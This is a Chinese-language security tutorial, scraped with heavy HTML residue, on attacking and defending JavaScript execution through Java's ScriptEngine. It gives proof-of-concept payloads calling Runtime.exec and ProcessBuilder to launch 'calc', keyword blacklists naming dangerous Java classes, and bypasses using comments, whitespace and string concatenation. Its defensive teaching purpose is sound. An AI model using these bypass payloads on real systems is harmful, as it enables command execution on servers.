Java中JS命令执行的攻与防<\/h1>

漏洞背景<\/h2>
在Java应用程序中，当使用`javax.script.ScriptEngine<\/code>执行JavaScript代码时，如果未做适当的安全限制，攻击者可能通过JavaScript调用Java API实现命令执行。本文详细分析了一个实际案例中的攻防过程。<\/p>`

漏洞发现<\/h2>
初始代码实现<\/h3>
\/\/ 正则表达式检查
<\/span><\/span><\/span><\/span>String JAVASCRIPT_MAIN=<\/span>"[\\s\\S]*"<\/span>+<\/span>"function"<\/span>+<\/span>"\\s+"<\/span>+<\/span>"mainOutput"<\/span>+<\/span>"[\\s\\S]*"<\/span>;<\/span>
<\/span><\/span>\/\/ 传入的字符串
<\/span><\/span><\/span><\/span>String test=<\/span>"print('hello word!!');function mainOutput() {}"<\/span>;<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 代码执行点
<\/span><\/span><\/span><\/span>if<\/span> (<\/span>Pattern.<\/span>matches<\/span>(<\/span>JAVASCRIPT_MAIN,<\/span>test)){<\/span>
<\/span><\/span>    ScriptEngineManager manager =<\/span> new<\/span> ScriptEngineManager(<\/span>null<\/span>);<\/span>
<\/span><\/span>    ScriptEngine engine =<\/span> manager.<\/span>getEngineByName<\/span>(<\/span>"js"<\/span>);<\/span>
<\/span><\/span>    engine.<\/span>eval<\/span>(<\/span>test);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>攻击向量<\/h3>
攻击者可以通过构造特殊字符串绕过正则检查并执行任意Java代码：<\/p>
String test=<\/span>"var a = mainOutput(); function mainOutput() { 
<\/span><\/span><\/span>    var x=java.lang.Runtime.getRuntime().exec("<\/span>calc")};"<\/span>;<\/span>
<\/span><\/span><\/code><\/pre>防御措施演进<\/h2>
第一版黑名单防御<\/h3>
开发人员实现了基于关键字的黑名单过滤：<\/p>
class<\/span> KeywordCheckUtils<\/span> {<\/span>
<\/span><\/span>    private<\/span> static<\/span> final<\/span> Set<<\/span>String><\/span> blacklist =<\/span> Sets.<\/span>newHashSet<\/span>(<\/span>
<\/span><\/span>        "java.io.File"<\/span>,<\/span> "java.lang.Runtime"<\/span>,<\/span> "java.lang.System"<\/span>,<\/span> 
<\/span><\/span>        "java.lang.ProcessBuilder"<\/span>,<\/span> "eval"<\/span>,<\/span> "new function"<\/span>);<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> void<\/span> checkInsecureKeyword<\/span>(<\/span>String code)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        Set<<\/span>String><\/span> insecure =<\/span> blacklist.<\/span>stream<\/span>()<\/span>
<\/span><\/span>            .<\/span>filter<\/span>(<\/span>s -><\/span> StringUtils.<\/span>containsIgnoreCase<\/span>(<\/span>code,<\/span> s))<\/span>
<\/span><\/span>            .<\/span>collect<\/span>(<\/span>Collectors.<\/span>toSet<\/span>());<\/span>
<\/span><\/span>        if<\/span> (!<\/span>CollectionUtils.<\/span>isEmpty<\/span>(<\/span>insecure))<\/span> {<\/span>
<\/span><\/span>            throw<\/span> new<\/span> Exception(<\/span>"输入字符串不是安全的"<\/span>);<\/span>
<\/span><\/span>        }<\/span> else<\/span> {<\/span>
<\/span><\/span>            ScriptEngineManager manager =<\/span> new<\/span> ScriptEngineManager(<\/span>null<\/span>);<\/span>
<\/span><\/span>            ScriptEngine engine =<\/span> manager.<\/span>getEngineByName<\/span>(<\/span>"js"<\/span>);<\/span>
<\/span><\/span>            engine.<\/span>eval<\/span>(<\/span>code);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>绕过方法1：使用注释<\/h3>
String test=<\/span>"var a = mainOutput(); function mainOutput() { 
<\/span><\/span><\/span>    var x=java.lang.\/****\/Runtime.getRuntime().exec(\"calc\");};"<\/span>;<\/span>
<\/span><\/span><\/code><\/pre>绕过方法2：使用ProcessBuilder<\/h3>
String test=<\/span>"var a = mainOutput(); function mainOutput() { 
<\/span><\/span><\/span>    var x=new java.lang.ProcessBuilder; x.command(\"calc\"); x.start();return true;};"<\/span>;<\/span>
<\/span><\/span><\/code><\/pre>第二版防御：过滤注释和空格<\/h3>
public<\/span> static<\/span> void<\/span> checkInsecureKeyword<\/span>(<\/span>String code)<\/span> {<\/span>
<\/span><\/span>    \/\/ 去除注释
<\/span><\/span><\/span><\/span>    String removeComment =<\/span> StringUtils.<\/span>replacePattern<\/span>(<\/span>code,<\/span> 
<\/span><\/span>        "(?:\/\\*(?:[^*]|(?:\\*+[^*\/]))*\\*+\/)|(?:\/\/.*)"<\/span>,<\/span> ""<\/span>);<\/span>
<\/span><\/span>    \/\/ 多个空格替换为一个
<\/span><\/span><\/span><\/span>    String finalCode =<\/span> StringUtils.<\/span>replacePattern<\/span>(<\/span>removeComment,<\/span> "\\s+"<\/span>,<\/span> " "<\/span>);<\/span>
<\/span><\/span>    
<\/span><\/span>    Set<<\/span>String><\/span> insecure =<\/span> blacklist.<\/span>stream<\/span>()<\/span>
<\/span><\/span>        .<\/span>filter<\/span>(<\/span>s -><\/span> StringUtils.<\/span>containsIgnoreCase<\/span>(<\/span>finalCode,<\/span> s))<\/span>
<\/span><\/span>        .<\/span>collect<\/span>(<\/span>Collectors.<\/span>toSet<\/span>());<\/span>
<\/span><\/span>    if<\/span> (!<\/span>CollectionUtils.<\/span>isEmpty<\/span>(<\/span>insecure))<\/span> {<\/span>
<\/span><\/span>        throw<\/span> new<\/span> Exception(<\/span>"输入字符串不是安全的"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>绕过方法3：使用多余空格<\/h3>
String test=<\/span>"var a = mainOutput(); function mainOutput() { 
<\/span><\/span><\/span>    var x=java.lang.   Runtime.getRuntime().exec(\"calc\");};"<\/span>;<\/span>
<\/span><\/span><\/code><\/pre>最终防御方案<\/h3>
\/\/ 去除注释
<\/span><\/span><\/span><\/span>String removeComment =<\/span> StringUtils.<\/span>replacePattern<\/span>(<\/span>code,<\/span> 
<\/span><\/span>    "(?:\/\\*(?:[^*]|(?:\\*+[^*\/]))*\\*+\/)|(?:\/\/.*)"<\/span>,<\/span> ""<\/span>);<\/span>
<\/span><\/span>\/\/ 去除所有空格
<\/span><\/span><\/span><\/span>String removeWhitespace =<\/span> StringUtils.<\/span>replacePattern<\/span>(<\/span>removeComment,<\/span> "\\s+"<\/span>,<\/span> ""<\/span>);<\/span>
<\/span><\/span>\/\/ 多个空格替换为一个
<\/span><\/span><\/span><\/span>String oneWhiteSpace =<\/span> StringUtils.<\/span>replacePattern<\/span>(<\/span>removeComment,<\/span> "\\s+"<\/span>,<\/span> " "<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>Set<<\/span>String><\/span> insecure =<\/span> blacklist.<\/span>stream<\/span>()<\/span>
<\/span><\/span>    .<\/span>filter<\/span>(<\/span>s -><\/span> StringUtils.<\/span>containsIgnoreCase<\/span>(<\/span>removeWhitespace,<\/span> s)<\/span> ||<\/span>
<\/span><\/span>              StringUtils.<\/span>containsIgnoreCase<\/span>(<\/span>oneWhiteSpace,<\/span> s))<\/span>
<\/span><\/span>    .<\/span>collect<\/span>(<\/span>Collectors.<\/span>toSet<\/span>());<\/span>
<\/span><\/span><\/code><\/pre>高级绕过技术<\/h2>
即使经过上述防御，仍存在潜在绕过方法：<\/p>
var<\/span> x<\/span>=<\/span>new<\/span> Function('return'<\/span>+<\/span>'(new java.'<\/span>+<\/span>'lang.ProcessBuilder)'<\/span>)();  
<\/span><\/span>x<\/span>.command<\/span>("calc"<\/span>); 
<\/span><\/span>x<\/span>.start<\/span>(); 
<\/span><\/span>var<\/span> a<\/span> =<\/span> mainOutput<\/span>(); 
<\/span><\/span>function<\/span> mainOutput<\/span>() {};
<\/span><\/span><\/code><\/pre>安全建议<\/h2>

避免使用ScriptEngine执行不可信代码<\/strong>：这是最根本的解决方案<\/li>
使用白名单而非黑名单<\/strong>：黑名单总是存在被绕过的风险<\/li>
实现真正的沙箱环境<\/strong>：如使用Java Security Manager或专业JS沙箱<\/li>
考虑性能与安全的平衡<\/strong>：完全安全的方案可能影响性能，需要权衡<\/li>
<\/ol>
总结<\/h2>
Java中执行JavaScript代码存在严重安全风险，黑名单防御方式容易被绕过。开发者应：<\/p>

理解攻击者的思维方式<\/li>
采用多层次防御<\/li>
优先考虑白名单而非黑名单<\/li>
在安全性和灵活性之间找到平衡点<\/li>
<\/ul>
安全是一个持续的过程，需要不断更新防御措施以应对新的攻击技术。<\/p>

Java中JS命令执行的攻与防<\/h1>

漏洞背景<\/h2> 在Java应用程序中，当使用javax.script.ScriptEngine<\/code>执行JavaScript代码时，如果未做适当的安全限制，攻击者可能通过JavaScript调用Java API实现命令执行。本文详细分析了一个实际案例中的攻防过程。<\/p>

防御措施演进<\/h2>

漏洞背景<\/h2>
在Java应用程序中，当使用`javax.script.ScriptEngine<\/code>执行JavaScript代码时，如果未做适当的安全限制，攻击者可能通过JavaScript调用Java API实现命令执行。本文详细分析了一个实际案例中的攻防过程。<\/p>`